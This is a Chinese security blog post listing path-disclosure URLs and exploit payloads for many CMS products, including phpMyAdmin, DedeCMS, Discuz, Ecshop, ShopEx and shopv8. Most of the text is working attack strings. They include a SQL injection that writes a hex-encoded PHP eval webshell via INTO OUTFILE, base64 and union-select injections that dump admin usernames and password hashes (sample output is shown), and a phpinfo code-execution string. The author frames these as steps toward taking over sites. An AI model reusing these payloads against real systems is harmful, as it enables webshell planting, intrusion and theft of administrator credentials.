记各种cms网站爆绝对路径方法

  • A+
所属分类:安全博客
摘要

绝对路径信息泄露 很多时候写webshell常常要用到绝对路径,小记一下。偶然翻到的东西。   

绝对路径信息泄露

前言

很多时候写webshell常常要用到绝对路径,小记一下。偶然翻到的东西。   

Phpmyadmin暴路径:
phpmyadmin/libraries/select_lang.lib.php 得到物理路径
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpmyadmin/index.php?lang[]=1
phpMyAdmin/phpinfo.php
phpmyadmin/libraries/mcrypt.lib.php
phpmyadmin/libraries/export/xls.php
phpmyadmin/libraries/lect_lang.lib.php

Phpmyadmin最新重定向漏洞:
error.php?

type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via

+characters+injection[br]It%27s+possible+use+some+special+tags+too

[br]Found+by+Tiger+Security+Tiger+Team+-+[a%

40http://www.safeclub.tk%40_self]This%20Is%20a%20Link[%2Fa]

DEDECMS通杀暴路径:
http://www.dedecms.com/plus/paycenter/alipay/return_url.php
 
http://www.dedecms.com/plus/paycenter/cbpayment/autoreceive.php
 
http://www.dedecms.com/plus/paycenter/nps/config_pay_nps.php
 
http://www.dedecms.com/plus/task/dede-maketimehtml.php
 
http://www.dedecms.com/plus/task/dede-optimize-table.php
 
http://www.dedecms.com/plus/task/dede-upcache.php

include/dialoguser/login.php
include/dialog/select_soft.php    暴后台
 

Discuz!5.2  5.1  4.1  4.0版本暴路径:
http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%

3D1
http://www.discuz.net/viewthread.php?tid=316&pid=1453&page
[]

=1&extra=page%3D1#pid1453
 

Discuz7.2 manyou插件暴路径:7.1也可暴
/manyou/sources/notice.php
/manyou/admincp.php?my_suffix=%0A%0DTOBY57

写入SHELL(要开DUMPFILE)
http://www.0daynet.com/userapp.php
?

script=notice&view=all&option=deluserapp&action=invite&hash=%27%

20union%20select%

20NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275

D293B3F3E,NULL,NULL,NULL,NULL%20into%20outfile%20%

27E://hackertest.php%27%23%A1%B1

注册一个用户后提交:
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=

{${phpinfo()}}
 

Discuz5.5暴路径:
wap/include/search.inc.php

如果当前数据库帐号有File_priv的话我们也可以直接into outfile。

/userapp.php?

script=notice&view=all&option=deluserapp&action=invite&hash='union

select

NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D2

93B3F3E,NULL,NULL,NULL,NULL into outfile

'C:/inetpub/wwwroot/shell.php'%23

Ecshop2.7.0暴管理员密码:
/search.php?

encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE

JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHB

hc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3Vz

ZXIjIjtzOjE6IjEiO319
 

Ecshop暴路径:
/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%

0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%

0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%

0A

织梦管理系统后台查找
时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。
这个时候 大家可以尝试下在地址后面 加上:
/include/dialog/select_media.php?f=form1.murl

Z-BLOG 1.8 Walle Build 100427 爆路径漏洞
admin/FCKeditor/editor/dialog/fck%

5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php
 

WordPress老版本暴路径:
wp-content/plugins/akismet/akismet.php
wp-content/plugins/hello.php
wp-content/themes/default/404.php
wp-admin/themes
wp-content/themes/default
wp-settings.php
 

Tomcat3.1暴路径
http://narco.guerrilla.sucks.co:8080/anything.jsp

 

ShopEX4.8.4暴路径和下载数据库:
install/svinfo.php?phpinfo=true
home/cache/cachedata.php
shopadmin/index.php?ctl=sfile&act=getDB&p[0]=http://www.cnblogs.com/config/config.php

ecshop网店系统变种入侵
search.php?

encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE

JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHB

hc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3Vz

ZXIjIjtzOjE6IjEiO319

例如:http://www.****.com/search.php?

encode=YToxOntzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTI3ODY2NzMwNTt9

大家注意后面的encode=,这里就加入我们的EXP变种代码:

YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb

2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3

JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjt

zOjE6IjEiO319 
http://www.****.com/search.php
?

encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE

JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHB

hc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3Vz

ZXIjIjtzOjE6IjEiO319

打开后就可以暴出用户名的密码:
 ('椰子:75b747bbd05cb68a66b792f8c0c6e002"') union select

1#"','ggg:822fc056b87417e4bc68969c150ca5c6"') union select 1#"')
 
后台路径:/admin/index.php

密码是经过MD5加密的,接下来的事我就不用多废话了.....

vBulletin 3.6.4 暴路径:
http://192.168.240.129/forum/admincp/index.php?do=phpinfo

U-MAIL后台拿shell:
登陆后在 信纸管理 中添加信纸,上传一句话PHP马文件预览图即可得到地址。

PHPCMS2008 SP4暴路径:先注册一个用户
/member/register.php   登陆用户后提交即可爆出物理路径:
/corpandresize/process.php?pic=../images/logo.gif
后台登陆:/admin.php
 

shopv8 v10.84 商城系统注入漏洞

在注入点:http://127.0.0.1:99/list.asp?id=322,直接用注入中转器生成个

页面,爆用户名和密码,如图:

注入语句:

http://127.0.0.1:99/jmCook.asp?jmdcw=322%20and%201=2%20union%

20select%

201,2,3,4,5,6,7,8,9,10,11,12,13,username,password,16,17,18,19,20,21,2

2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4

5,46,47,48,49,50,51,52,53%20from%20admin

在Md5查询的网站查出明文密码,然后进后台,做你要做的。

Sun GlassFish Enterprise Server v2.1.1

关键字: Sun GlassFish Enterprise Server v2.1.1 /editor/fckeditor/editor/
用谷歌搜索这个!就会看到目录!
这个是一个编辑器漏洞。

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

记各种cms网站爆绝对路径方法

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-10-22

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: